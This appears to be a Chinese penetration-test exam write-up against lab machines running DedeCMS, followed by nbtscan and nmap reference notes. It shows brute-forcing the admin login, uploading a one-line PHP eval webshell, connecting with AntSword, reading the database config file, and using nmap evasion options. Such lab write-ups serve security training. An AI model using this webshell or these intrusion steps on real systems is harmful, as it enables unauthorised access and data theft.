渗透测试考核(靶机1)

信息收集

主机发现

nbtscan -r 172.16.17.0/24 

 发现在局域网内,有两台主机名字比较可疑,177和134,猜测其为目标主机,其余的应该是局域网内的其他用户,因为其主机名字比较显眼,有姓名的拼音和笔记本电脑的型号

 目标主机端口扫描

nmap -F 172.16.17.177 

177主机 发现80端口的http服务是开启的,还有3306端口的mysql服务也是开启的

nmap -F 172.16.17.134

 同样的134主机也是开启了相同的服务

扫描文件目录

dirsearch -u  xxxxxxxxxxxxx

 发现可以有很多200的响应,也就证明很多页面都可以访问

 解题177

首先先访问172.16.17.177:80

 发现是织梦CMS系统,可以在百度寻找其所存在的漏洞及系统文件目录结构

 找到文件目录结构先不急着访问其目录文件,因为还不清楚在这个环境是否有改动,先尝试着访问目录扫描出的文件

http://172.16.17.177/member/login.php

 登录框的会员功能被关了,无法进行登录,接着尝试访问

http://172.16.17.177/README.md

这些文件有点可疑,可以尝试访问

 许多文件访问了都没有什么有用的信息,直到访问dede是后台登录管理

 百度搜索到其默认用户是admin,尝试用该用户名登录爆破密码

 用户名admin密码1q2w3e4r

登录进去,发现flag2

 接着在这个后台寻找漏洞,同时也百度织梦cms的漏洞

是文件上传漏洞

这是网上的文件上传wp:https://www.cnblogs.com/punished/p/14743203.html

 但是我上传的方式不一样,不是在内容中心上传而是在后台直接上传简单的一句话木马,文件名为1.php

   <?php @eval($_POST['cmd']); ?>

 

 1.php上传成功后用蚁剑连接

 进入文件目录后开始寻找flag

成功找到flag3

根据织梦cms的默认配置文件系统:织梦DEDECMS数据库配置文件在哪?如何修改配置信息_织梦数据库配置文件_二胖的窝的博客-CSDN博客

 织梦数据库配置文件在/data/common.inc.php

发现其数据库信息

 连接上数据库

 在数据库的表中找flag,成功找到flag1

 笔记

 nbtscan

这是一款用于扫描Windows网络上NetBIOS名字信息的程序。该程序对给出范围内的每一个地址发送NetBIOS状态查询,并且以易读的表格列出接收到的信息,对于每个响应的主机,NBTScan列出它的IP地址、NetBIOS计算机名、登录用户名和MAC地址。但只能用于局域网,NBTSCAN可以取到PC的真实IP地址和MAC地址,如果有”ARP攻击”在做怪,可以找到装有ARP攻击的PC的IP/和MAC地址。但只能用于局域网,NBTSCAN可以取到PC的真实IP地址和MAC地址,如果有”ARP攻击”在做怪,可以找到装有ARP攻击的PC的IP/和MAC地址。NBTSCAN可以取到PC的真实IP地址和MAC地址,如果有”ARP攻击”在做怪,可以找到装有ARP攻击的PC的IP/和MAC地址。总之,NBTSCAN可以取到PC的真实IP地址和MAC地址。

用法: nbtscan-unixwiz [选项] 目标 [目标...]目标可以是IP地址,DNS名称或地址的列表范围。范围可以表示成“192.168.12.0/24”或“192.168.12.64-97”-V        显示版本信息-f        显示完整的NBT资源记录响应(推荐)-H        生成HTTP请求头-v        开启详细输出调试-n        不查找响应IP地址的反向名称-p <n>    绑定UDP端口(默认0)-m        响应中包含MAC地址 (等同'-f')-T <n>    超时不响应 (默认2秒)-w <n>    次写入后等待秒数 (默认10ms)-t <n>    每个地址尝试次数(默认1次)-P        以perl的hashref格式生成结果

 nmap

Nmap的定义:

Nmap是一款开源的网络探测和安全审核工具,可以用来扫描网络主机,确定哪些主机在运行、运行哪些服务以及运行哪个操作系统等信息。它可以通过各种方式对目标主机进行探测,如TCP SYN扫描、UDP扫描、TCP connect() 扫描、FTP bounce攻击扫描等。同时,nmap还具有多种高级功能,如操作系统指纹识别、版本探测、脚本扫描等,是网络安全人员必备的工具之一。


Nmap的特点 :

  •     可以扫描本地网络中的所有设备,包括开放的端口和服务。
  •     可以进行远程主机的端口扫描,以及对远程主机进行操作系统和服务版本的探测。
  •     支持多种扫描技术,如TCP、UDP、ICMP等。
  •     可以进行灵活的扫描范围和扫描选项的配置。
  •     可以使用脚本进行高级扫描和漏洞检测。
  •     可以输出多种格式的扫描结果,如文本、XML、HTML等。
  •     可以通过插件机制进行功能扩展。

Nmap的应用场景:

  •     在网络安全领域,nmap可以用来扫描网络上的主机和端口,以便发现网络中存在的漏洞和安全隐患。
  •     在系统管理领域,nmap可以用来检查网络设备的配置和状态,以便确定网络中存在的问题和瓶颈。
  •     在开发领域,nmap可以用来测试网络应用程序的安全性和性能,以便提高应用程序的质量和可靠性。
  •     在渗透测试领域,nmap可以用来获取目标网络的拓扑结构和服务信息,以便制定攻击计划和选择攻击方式。
  •     在网络监控领域,nmap可以用来监测网络设备的状态和活动,以便及时发现和解决网络故障和安全事件。

 常用命令

1. nmap -sT 192.168.96.4  //TCP连接扫描,不安全,慢2. nmap -sS 192.168.96.4  //SYN扫描,使用最频繁,安全,快3. nmap -Pn 192.168.96.4  //目标机禁用ping,绕过ping扫描4. nmap -sU 192.168.96.4  //UDP扫描,慢,可得到有价值的服务器程序5. nmap -sI 僵尸ip 目标ip  //使用僵尸机对目标机发送数据包6. nmap -sA 192.168.96.4  //检测哪些端口被屏蔽7. nmap 192.168.96.4 -p <portnumber>  //对指定端口扫描8. nmap 192.168.96.1/24 //对整个网段的主机进行扫描9. nmap 192.168.96.4 -oX myscan.xml //对扫描结果另存在myscan.xml10. nmap -T1~6 192.168.96.4  //设置扫描速度,一般T4足够。11. nmap -sV 192.168.96.4  //对端口上的服务程序版本进行扫描12. nmap -O 192.168.96.4  //对目标主机的操作系统进行扫描13. nmap -sC <scirptfile> 192.168.96.4  //使用脚本进行扫描,耗时长14. nmap -A 192.168.96.4  //强力扫描,耗时长15. nmap -6 ipv6地址   //对ipv6地址的主机进行扫描16. nmap -f 192.168.96.4  //使用小数据包发送,避免被识别出17. nmap –mtu <size> 192.168.96.4 //发送的包大小,最大传输单元必须是8的整数18. nmap -D <假ip> 192.168.96.4 //发送参杂着假ip的数据包检测19. nmap --source-port <portnumber> //针对防火墙只允许的源端口20. nmap –data-length: <length> 192.168.96.4 //改变发生数据包的默认的长度,避免被识别出来是nmap发送的。21. nmap -v 192.168.96.4  //显示冗余信息(扫描细节)22. nmap -sn 192.168.96.4  //对目标进行ping检测,不进行端口扫描(会发送四种报文确定目标是否存活,)23. nmap -sP 192.168.96.4  //仅仅对目标进行ping检测。24. nmap -n/-R 192.168.96.4  //-n表示不进行dns解析,-R表示对ip进行dns反向解析25. nmap --system-dns 192.168.96.4  //扫描指定系统的dns服务器26. nmap –traceroute 192.168.96.4  //追踪每个路由节点。27. nmap -PE/PP/PM: 使用ICMP echo, timestamp, and netmask 请求包发现主机。28. nmap -sP 192.168.96.4       //主机存活性扫描,arp直连方式。29. nmap -iR [number]       //对随机生成number个地址进行扫描。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/231667.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Docker快速创建一个单机版的Jenkins实例

谈到 CI/CD&#xff0c;那便少不了这里面的佼佼者 Jenkins&#xff0c;正如 Jenkins 官网说的一样&#xff1a;“Build great things at any scale”&#xff0c;构建伟大&#xff0c;无所不能&#xff01; 话不多说&#xff0c;该篇文章将会带你使用 Docker 快速创建一个单机…

如何通过CRM实现客户关系管理?

——“小米加步枪是打不赢现代化战争的。” ——”CRM系统已成为企业掘金未来的必备。“ 数字化转型已经成为了企业发展的重要方向&#xff0c;然而数字化转型不仅仅是把线下搬到线上&#xff0c;更重要的是&#xff0c;真正的数字化转型应该以客户的连接和客户的数字化作为突破…

Java中xml映射文件是干什么的

Java中的XML映射文件主要用于将Java对象与XML文档之间进行转换。它通常用于处理数据交换和存储&#xff0c;例如将Java对象转换为XML格式以便在网络上传输或保存到文件中&#xff0c;或者将XML文档解析为Java对象以进行处理。这种转换可以通过Java的JAXB&#xff08;Java Archi…

数据结构树与二叉树(5)Huffman树

#include <iostream> #include <stack> #include <queue>using namespace std;struct Node {char name ;int code[200];int num 0;//code的下标int weight 0;//权重&#xff08;次数&#xff09;Node* lchild;//左孩子Node* rchild;//右孩子Node* parent;N…

二.运算符

运算符 1.算术运算符2.比较运算符3.逻辑运算符 1.算术运算符 算数运算符主要用于数学运算&#xff0c;其可以连接运算符前后的两个数值或表达式&#xff0c;对数值或表达式进行 - * / 和 取模%运算 1.加减法运算符 mysql> SELECT 100,100 0,100 - 0,100 50,100 50 - …

Unity引擎:创造无限可能的游戏开发平台

Unity引擎&#xff1a;创造无限可能的游戏开发平台 一、Unity引擎概述1.1 什么是Unity引擎&#xff1f;1.2 Unity引擎的特点和优势 二、Unity开发环境和工具2.1 Unity编辑器2.2 支持的平台2.3 脚本语言2.4 图形和音频工具 三、Unity游戏开发流程四、示例应用场景五、结论&#…

【知识】稀疏矩阵是否比密集矩阵更高效?

转载请注明出处&#xff1a;小锋学长生活大爆炸[xfxuezhang.cn] 问题提出 有些地方说&#xff0c;稀疏图比密集图的计算效率更高&#xff0c;真的吗&#xff1f; 原因猜想 这里的效率高&#xff0c;应该是有前提的&#xff1a;当使用稀疏矩阵的存储格式(如CSR)时&#xff0c;计…

Message全局提示(antd-design组件库)简单用法

1.Message全局提示 全局展示操作反馈信息。 2.何时使用 可提供成功、警告和错误等反馈信息。 顶部居中显示并自动消失&#xff0c;是一种不打断用户操作的轻量级提示方式。 组件代码来自&#xff1a; 全局提示 Message - Ant Design 3.本地验证前的准备 参考文章【react项目ant…

L298N模块使用简介

接口作用ENA/ENB使用PWM调节马达转速&#xff08;调速&#xff09;左边一对接口接电机的正负极右边一对接口接电机正负极控制IN1,IN2 控制左边的2个接口的电压&#xff0c;IN1控制一个&#xff0c;IN2控制另外一个 IN1输入3.3V时&#xff0c;OUT1输出3.3v电压&#xff08;可能是…

vue3跟vue2的区别?

​&#x1f308;个人主页&#xff1a;前端青山 &#x1f525;系列专栏&#xff1a;Vue篇 &#x1f516;人终将被年少不可得之物困其一生 依旧青山,本期给大家带来vue篇专栏内容:vue3和vue2的区别 目录 一、Vue3介绍 哪些变化 速度更快 体积更小 更易维护 compositon Api …

开发知识点-Maven包管理工具

Maven包管理工具 SpringBootSpringSecuritydubbo图书电商后台实战-环境设置&#xff08;JDK8, STS, Maven, Spring IO, Springboot&#xff09;点餐小程序Java版本的选择和maven仓库的配置视频管理系统&&使用maven-tomcat7插件运行web工程SpringTool suite——maven项目…

【C语言】把歌词里的播放时间跟歌词提取出来

一&#xff0c;介绍 给到一个字符串&#xff0c;里面包含了时间&#xff08;唱该歌词的时间以及该歌词&#xff09;例如“[02:16.33][04:11.44][05:11.44]我想大声宣布对你依依不舍”&#xff0c;如何把两者都给打印出来呢&#xff1f;下面给出解释 二&#xff0c;代码 #incl…